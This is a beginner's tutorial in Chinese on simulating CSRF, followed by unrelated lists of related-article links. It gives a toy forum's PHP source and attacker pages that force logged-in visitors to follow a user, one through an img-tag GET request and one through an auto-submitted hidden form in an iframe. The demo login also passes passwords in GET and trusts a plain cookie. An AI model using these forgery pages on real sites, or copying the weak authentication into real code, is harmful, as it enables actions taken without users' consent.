GET请求伪造

有一个论坛网站,网站有一个可以关注用户的接口,但是必须登录的用户才可以关注其他用户。

这个网站的网站是www.a.com

有一天有一个程序员想提高自己的知名度,决定利用CSRF让大家关注自己

》》该论坛的目录结构和源码资源

index.html

 <!DOCTYPE html>

 <html lang="en">

 <head>

     <meta charset="UTF-8">

     <meta name="viewport" content="width=device-width, initial-scale=1.0">

     <meta http-equiv="X-UA-Compatible" content="ie=edge">

     <title>主页</title>

 </head>

 <body>

     <form action="start.php" method="GET">

         <input type="text" name="startname" /><br>

         <input type="submit" value="关注他" /><br>

     </form>

 </body>

 </html>

login.html

 <!DOCTYPE html>

 <html lang="en">

 <head>

     <meta charset="UTF-8">

     <meta name="viewport" content="width=device-width, initial-scale=1.0">

     <meta http-equiv="X-UA-Compatible" content="ie=edge">

     <title>登陆界面</title>

 </head>

 <body>

     <form action="login.php" method="GET">

         <input type="text" name="username" id="name"/><br>

         <input type="password" name="password" /><br>

         <input type="submit" value="登陆"/><br>

     </form>

 </body>

 </html>

login.php

 <?php

     session_start();

     if(isset($_GET['username']) && isset($_GET['password'])){

         $name=$_GET['username'];

         $password=$_GET['password'];

         if($name=="zhangshan" && $password=="wwwww"){

             echo "登陆成功,正在跳转。。。。";

             setcookie('loginstate',"$name");

             $_SESSION["$name"]=$name;

             echo '<meta http-equiv="refresh" content="0;url=index.html" />';

         }else{

             echo "登陆失败,重新登陆......";

             echo '<meta http-equiv="refresh" content="3;url=login.html" />';

         }

     }else{

         echo "输入有误。。。。。密码不正确";

         echo '<meta http-equiv="refresh" content="1;url=login.html" />';

     }

 ?>

关注的接口,关注之后会打日志到log.txt

 <?php

 session_start();

 if(isset($_GET['startname'])){

     if(isset($_COOKIE['loginstate'])){

         $name=$_SESSION[$_COOKIE['loginstate']];

         $startname=$_GET['startname'];

         echo "当前登陆用户为$name";

         echo "<br>";

         echo "尊敬的$name,你已经成功关注了$startname";

         $myfile = fopen("log.txt", "w") or die("Unable to open file!");

         $txt = "尊敬的$name,你已经成功关注了$startname"."\n";

         fwrite($myfile, $txt);

         fclose($myfile);

     }else{

         echo "你还没有登陆,跳转中。。。。。";

         echo '<meta http-equiv="refresh" content="3;url=login.html" />';

     }

 }else{

     echo "请输入你要关注的用户";

     echo '<meta http-equiv="refresh" content="0;url=index.html" />';

 }

 ?>

》》攻击者的网站

攻击者的网站的一个页面是这样的

 <!DOCTYPE html>

 <html lang="en">

 <head>

     <meta charset="UTF-8">

     <meta name="viewport" content="width=device-width, initial-scale=1.0">

     <meta http-equiv="X-UA-Compatible" content="ie=edge">

     <title>Document</title>

 </head>

 <body>

     如果,客户端不久前登陆过www.a.com,

     打开此页,自动关注,woshihaore

     <img src="http://www.a.com/start.php?startname=woshihaoren" />

 </body>

 </html>

这样的话,只要用户在登陆过a网站之后,在浏览器中打开b网站的这个网页,就会自动执行该接口,关注自己,提高关注量的目的达到

》》攻击者可以将链接放在任何可以被浏览器解析并发送请求的地方

如果该接口使用的POST传值的话也是可以的,需要在攻击者的网页上构造一个form表单,但是form表单提交是非跨域的请求,所以请求并不会提交,

但是使用iframe可以解决这个问题,iframe可以解决跨域的问题。

————————————————————————————————————————————————————————————————————————————

有些时候,网站可能采用POST来提交参数,但是form表单受制于同源策略的影响,这种情况下的跨域提交数据。

跨域POST请求伪造之邪恶的iframe

有 一个网站a,存在一个接口,这个接口允许已经登陆的用户,关注别的用户,这个接口需要一个被关注的用户的用户名参数,该接口使用POST传参数

网站a的源码结构

index.html页面使用用户登陆后的页面,这个页面的的form表单提交一个被关注人的用户名

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>主页</title>

</head>

<body>

    <form action="start.php" method="POST">

        <input type="text" name="startname" /><br>

        <input type="submit" value="关注他" /><br>

    </form>

</body>

</html>

log.txt为日志输出,用户关注的信息会输出到这个日志文件

login.html---为登陆的前端页面

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>登陆界面</title>

</head>

<body>

    <form action="login.php" method="GET">

        <input type="text" name="username" id="name"/><br>

        <input type="password" name="password" /><br>

        <input type="submit" value="登陆"/><br>

    </form>

</body>

</html>

login.php---为登陆的后台页面,简单的生成session会话

<?php

    session_start();

    if(isset($_GET['username']) && isset($_GET['password'])){

        $name=$_GET['username'];

        $password=$_GET['password'];

        if($name=="zhangshan" && $password=="wwwww"){

            echo "登陆成功,正在跳转。。。。";

            setcookie('loginstate',"$name");

            $_SESSION["$name"]=$name;

            echo '<meta http-equiv="refresh" content="0;url=index.html" />';

        }else{

            echo "登陆失败,重新登陆......";

            echo '<meta http-equiv="refresh" content="3;url=login.html" />';

        }

    }else{

        echo "输入有误。。。。。密码不正确";

        echo '<meta http-equiv="refresh" content="1;url=login.html" />';

    }

?>

start.php---为关注用户的后台接口,接收POST传值

<?php

session_start();

if(isset($_POST['startname'])){

    if(isset($_COOKIE['loginstate'])){

        $name=$_SESSION[$_COOKIE['loginstate']];

        $startname=$_POST['startname'];

        echo "当前登陆用户为$name";

        echo "<br>";

        echo "尊敬的$name,你已经成功关注了$startname";

        $myfile = fopen("log.txt", "w") or die("Unable to open file!");

        $txt = "尊敬的$name,你已经成功关注了$startname"."\n";

        fwrite($myfile, $txt);

        fclose($myfile);

    }else{

        echo "你还没有登陆,跳转中。。。。。";

        echo '<meta http-equiv="refresh" content="3;url=login.html" />';

    }

}else{

    echo "请输入你要关注的用户";

    echo '<meta http-equiv="refresh" content="0;url=index.html" />';

}

?>

网站b作为攻击者的网站,网站b的目录结构

index.html

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>测试跨站请求伪造POST</title>

    <script type="text/javascript">

        function csrf(){

            window.frames['steal'].document.forms[0].submit();

        }

    </script>

</head>

<body onload="csrf()">

    <iframe display="none" name="steal" src="./csrf.html">

    </iframe>

</body>

</html>

csrf.html

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>Document</title>

</head>

<body>

    <form action="http://www.a.com/start.php" method="POST" display="none">

        <input type="text" name="startname" value="woshihaoren"/><br>

        <input type="submit" value="关注他" /><br>

    </form>

</body>

</html>

这种通过在iframe中嵌套form从而达到使form跨域操作。

这样的话,登陆了a网站的人,再访问b网站的主页就会自动关注表单提交的用户名。

模拟一次CSRF(跨站请求伪造)例子,适合新手的更多相关文章

  1. Django之CSRF跨站请求伪造(老掉牙的钓鱼网站模拟)

    首先这是一个测试的代码 请先在setting页面进行下面操作 注释完成后,开始模拟钓鱼网站的跨站请求伪造操作: 前端代码: <!DOCTYPE html> <html lang=&q ...

  2. Django中的CSRF(跨站请求伪造)

    Django中的CSRF(跨站请求伪造) Django CSRF  什么是CSFR 即跨站请求伪装,就是通常所说的钓鱼网站. 钓鱼网站的页面和正经网站的页面对浏览器来说有什么区别? (页面是怎么来的? ...

  3. Web框架之Django_09 重要组件(Django中间件、csrf跨站请求伪造)

    摘要 Django中间件 csrf跨站请求伪造 一.Django中间件: 什么是中间件? 官方的说法:中间件是一个用来处理Django的请求和响应的框架级别的钩子.它是一个轻量.低级别的插件系统,用于 ...

  4. Web框架之Django重要组件(Django中间件、csrf跨站请求伪造)

    Web框架之Django_09 重要组件(Django中间件.csrf跨站请求伪造)   摘要 Django中间件 csrf跨站请求伪造 一.Django中间件: 什么是中间件? 官方的说法:中间件是 ...

  5. XSS跨站脚本攻击与CSRF跨站请求伪造攻击的学习总结(转载)

    转载自 https://blog.csdn.net/baidu_24024601/article/details/51957270 之前就了解过这方面的知识,但是没有系统地总结.今天在这总结一下,也让 ...

  6. python CSRF跨站请求伪造

    python CSRF跨站请求伪造 <!DOCTYPE html> <html lang="en"> <head> <meta chars ...

  7. ajax向Django前后端提交请求和CSRF跨站请求伪造

    1.ajax登录示例 urls.py from django.conf.urls import url from django.contrib import admin from app01 impo ...

  8. python 全栈开发,Day87(ajax登录示例,CSRF跨站请求伪造,Django的中间件,自定义分页)

    一.ajax登录示例 新建项目login_ajax 修改urls.py,增加路径 from app01 import views urlpatterns = [ path('admin/', admi ...

  9. 第三百一十五节,Django框架,CSRF跨站请求伪造

    第三百一十五节,Django框架,CSRF跨站请求伪造  全局CSRF 如果要启用防止CSRF跨站请求伪造,就需要在中间件开启CSRF #中间件 MIDDLEWARE = [ 'django.midd ...

  10. Django框架 之 基于Ajax中csrf跨站请求伪造

    Django框架 之 基于Ajax中csrf跨站请求伪造 ajax中csrf跨站请求伪造 方式一 1 2 3 $.ajaxSetup({     data: {csrfmiddlewaretoken: ...

随机推荐

  1. CF 622 F The Sum of the k-th Powers —— 拉格朗日插值

    题目:http://codeforces.com/contest/622/problem/F 设 f(x) = 1^k + 2^k + ... + n^k 则 f(x) - f(x-1) = x^k ...

  2. 2.CSS 颜色代码大全

    确实使用,不用重复造轮子了!!! 摘自:http://www.cnblogs.com/circlebreak/p/6140602.html

  3. java面试编程题

      [程序1]   题目:古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?   //这是一个菲波拉契数列问 ...

  4. nohup 命令 print 不能实时输出至 nohup.out

    1. 原因 Python 的输出存在缓冲机制,因此不能实时输出结果至 nohup.out 2. 解决方案 用下面的命令即可解决: nohup python -u FileName > nohup ...

  5. 1.1- 1.2 hive入门

    一.hive是什么 由Facebook开源用于解决海量结构化日志的数据统计: Hive是基于Hadoop的一个数据仓库工具,可以将结构化的数据文件映射成一张表, 并提供类SQL查询功能: 构建在Had ...

  6. 原创|高逼格企业级MySQL数据库备份方案,原来是这样....

    很多人,这里说的是运维工程师们,一提到写某某方案,很是头疼.不是上某度一统搜索,就是同样一句话在N个群全部群发一遍:“有没有某某方案,可以共享一下的吗??求助,各位大佬们”,估计十有八九,全部石沉大海 ...

  7. hihocoder #1608 : Jerry的奶酪(状压DP)

    传送门 题意 分析 设dp[i][j]为在i状态下当前在第j个奶酪的最小费用 转移方程:dp[(1<<k)|i][k]=dp[i][j]+d[j][k] 预处理出每个奶酪之间的距离,加入起 ...

  8. hihocoder #1607 : H星人社交网络(双指针)

    传送门 题意 分析 可知对与某个数x,设其可发送信息的边界为[L,R],那么随着x的递增,[L,R]也右移,故可对输入数排序,做一次双指针即可 trick 代码 //1. Aj < 1/8 * ...

  9. 2016CCPC东北地区大学生程序设计竞赛【01/03/05/06/08】

    吧啦啦啦啦啦啦啦啦啦啦啦能量,ACM,跨!变身!变成一个智障! 04正在酝酿中!!!马上更新!!!!!  01题意:有一个n个点的图,对于任意两个不同的点,他的权值是两个点下标的最小公倍数,求最小生出 ...

  10. builtin_shaders-5.3.4f1学习-Unlit/Texture

    // Unlit shader. Simplest possible textured shader. // - no lighting // - no lightmap support // - n ...